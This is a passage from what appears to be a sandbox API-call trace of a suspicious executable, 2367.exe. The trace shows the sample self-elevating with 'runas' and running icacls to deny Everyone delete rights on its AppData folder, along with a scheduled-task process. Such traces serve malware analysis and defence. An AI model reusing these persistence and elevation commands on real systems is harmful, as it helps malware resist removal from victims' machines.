hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e00c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0111.720] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d3e9f0 | out: hHeap=0x31e0000) returned 1 [0111.720] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cc6680 | out: hHeap=0x31e0000) returned 1 [0111.720] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d419d8 | out: hHeap=0x31e0000) returned 1 [0111.722] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x32166f8 | out: hHeap=0x31e0000) returned 1 [0111.722] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x31fe6a8 | out: hHeap=0x31e0000) returned 1 [0111.722] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d3d9d8 | out: hHeap=0x31e0000) returned 1 [0111.722] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cdbc00 | out: hHeap=0x31e0000) returned 1 [0111.722] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x32014e8 | out: hHeap=0x31e0000) returned 1 [0111.724] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x3200600 | out: hHeap=0x31e0000) returned 1 [0111.724] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f2d4 | out: phModule=0x18f2d4) returned 0 [0111.724] ExitProcess (uExitCode=0x0) [0111.727] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d5c3c8 | out: hHeap=0x31e0000) returned 1 [0111.727] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x31ff240 | out: hHeap=0x31e0000) returned 1 [0111.764] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xa9c Thread: id = 3 os_tid = 0xa90 Thread: id = 4 os_tid = 0xa94 Thread: id = 5 os_tid = 0xa98 Thread: id = 6 os_tid = 0xa8c Thread: id = 7 os_tid = 0x7a4 Thread: id = 22 os_tid = 0x64 Thread: id = 23 os_tid = 0x7d4 Thread: id = 67 os_tid = 0x25c Thread: id = 78 os_tid = 0xb04 Thread: id = 79 os_tid = 0xb4c Thread: id = 89 os_tid = 0xad8 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0xaac Thread: id = 9 os_tid = 0x534 Thread: id = 10 os_tid = 0x768 Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x758 Thread: id = 13 os_tid = 0x724 Thread: id = 14 os_tid = 0x718 Thread: id = 15 os_tid = 0x714 Thread: id = 16 os_tid = 0x630 Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x118 Thread: id = 21 os_tid = 0xf0 Thread: id = 80 os_tid = 0xacc Thread: id = 128 os_tid = 0xa90 Thread: id = 129 os_tid = 0xa94 Thread: id = 130 os_tid = 0xa54 Thread: id = 183 os_tid = 0x330 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 24 os_tid = 0x6a4 Thread: id = 25 os_tid = 0x32c Thread: id = 26 os_tid = 0x54c Thread: id = 27 os_tid = 0xbc4 Thread: id = 28 os_tid = 0x4e4 Thread: id = 29 os_tid = 0x418 Thread: id = 30 os_tid = 0x5d8 Thread: id = 31 os_tid = 0x320 Thread: id = 32 os_tid = 0x6cc Thread: id = 33 os_tid = 0x42c Thread: id = 34 os_tid = 0x1e4 Thread: id = 35 os_tid = 0x760 Thread: id = 36 os_tid = 0x75c Thread: id = 37 os_tid = 0x74c Thread: id = 38 os_tid = 0x710 Thread: id = 39 os_tid = 0x6d0 Thread: id = 40 os_tid = 0x6bc Thread: id = 41 os_tid = 0x6b8 Thread: id = 42 os_tid = 0x6b0 Thread: id = 43 os_tid = 0x6a8 Thread: id = 44 os_tid = 0x69c Thread: id = 45 os_tid = 0x698 Thread: id = 46 os_tid = 0x688 Thread: id = 47 os_tid = 0x684 Thread: id = 48 os_tid = 0x678 Thread: id = 49 os_tid = 0x4a8 Thread: id = 50 os_tid = 0x46c Thread: id = 51 os_tid = 0x44c Thread: id = 52 os_tid = 0x424 Thread: id = 53 os_tid = 0x420 Thread: id = 54 os_tid = 0x41c Thread: id = 55 os_tid = 0x404 Thread: id = 56 os_tid = 0x14c Thread: id = 57 os_tid = 0x158 Thread: id = 58 os_tid = 0x3fc Thread: id = 59 os_tid = 0x3f4 Thread: id = 60 os_tid = 0x3e8 Thread: id = 61 os_tid = 0x39c Thread: id = 62 os_tid = 0x390 Thread: id = 63 os_tid = 0x38c Thread: id = 64 os_tid = 0x388 Thread: id = 65 os_tid = 0x37c Thread: id = 66 os_tid = 0x374 Thread: id = 68 os_tid = 0x9c4 Thread: id = 69 os_tid = 0x9d4 Thread: id = 70 os_tid = 0x9e4 Thread: id = 71 os_tid = 0x9f4 Thread: id = 72 os_tid = 0x9f8 Thread: id = 73 os_tid = 0xa7c Thread: id = 74 os_tid = 0x600 Thread: id = 75 os_tid = 0x524 Thread: id = 76 os_tid = 0xa84 Thread: id = 77 os_tid = 0xaf0 Thread: id = 167 os_tid = 0xa14 Thread: id = 168 os_tid = 0x220 Thread: id = 169 os_tid = 0x418 Thread: id = 170 os_tid = 0x7d8 Thread: id = 171 os_tid = 0x9a4 Thread: id = 172 os_tid = 0x4dc Thread: id = 173 os_tid = 0xa64 Thread: id = 174 os_tid = 0xb80 Thread: id = 175 os_tid = 0x644 Thread: id = 176 os_tid = 0x24c Thread: id = 177 os_tid = 0x360 Thread: id = 178 os_tid = 0x824 Thread: id = 179 os_tid = 0x67c Thread: id = 181 os_tid = 0x9f8 Thread: id = 188 os_tid = 0x930 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x4f624000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa14" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0xac8 Thread: id = 82 os_tid = 0xab8 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0x34c Thread: id = 84 os_tid = 0x5b4 Thread: id = 85 os_tid = 0x5b0 Thread: id = 86 os_tid = 0x59c Thread: id = 87 os_tid = 0x594 Thread: id = 88 os_tid = 0x58c Thread: id = 100 os_tid = 0xbb8 Thread: id = 127 os_tid = 0xb30 Process: id = "6" image_name = "2367.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe" page_root = "0x4eed2000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa14" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0xb44 [0111.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x4e21e710, dwHighDateTime=0x1d6bf06)) [0111.904] GetCurrentProcessId () returned 0xa80 [0111.904] GetCurrentThreadId () returned 0xb44 [0111.904] GetTickCount () returned 0x114fbec [0111.904] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23216901001) returned 1 [0111.905] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.905] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x210000 [0111.907] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.908] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0111.908] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0111.908] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0111.908] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0111.908] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.908] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.909] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.909] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.909] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.910] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.910] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.910] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.911] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.911] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x214) returned 0x2107d0 [0111.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.911] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.911] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.911] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.912] GetCurrentThreadId () returned 0xb44 [0111.912] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.912] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x800) returned 0x2109f0 [0111.912] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.912] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0111.912] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.912] SetHandleCount (uNumber=0x20) returned 0x20 [0111.912] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask" [0111.912] GetEnvironmentStringsW () returned 0x31e1cf8* [0111.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0111.913] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x565) returned 0x2111f8 [0111.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2111f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0111.913] FreeEnvironmentStringsW (penv=0x31e1cf8) returned 1 [0111.913] GetLastError () returned 0x0 [0111.913] SetLastError (dwErrCode=0x0) [0111.913] GetLastError () returned 0x0 [0111.913] SetLastError (dwErrCode=0x0) [0111.913] GetLastError () returned 0x0 [0111.913] SetLastError (dwErrCode=0x0) [0111.913] GetACP () returned 0x4e4 [0111.913] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x220) returned 0x211768 [0111.913] GetLastError () returned 0x0 [0111.913] SetLastError (dwErrCode=0x0) [0111.913] IsValidCodePage (CodePage=0x4e4) returned 1 [0111.913] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0111.913] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0111.913] GetLastError () returned 0x0 [0111.914] SetLastError (dwErrCode=0x0) [0111.914] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.914] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0111.914] GetLastError () returned 0x0 [0111.914] SetLastError (dwErrCode=0x0) [0111.914] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā") returned 256 [0111.914] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.914] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÚ\x97.)\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.914] GetLastError () returned 0x0 [0111.914] SetLastError (dwErrCode=0x0) [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.914] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 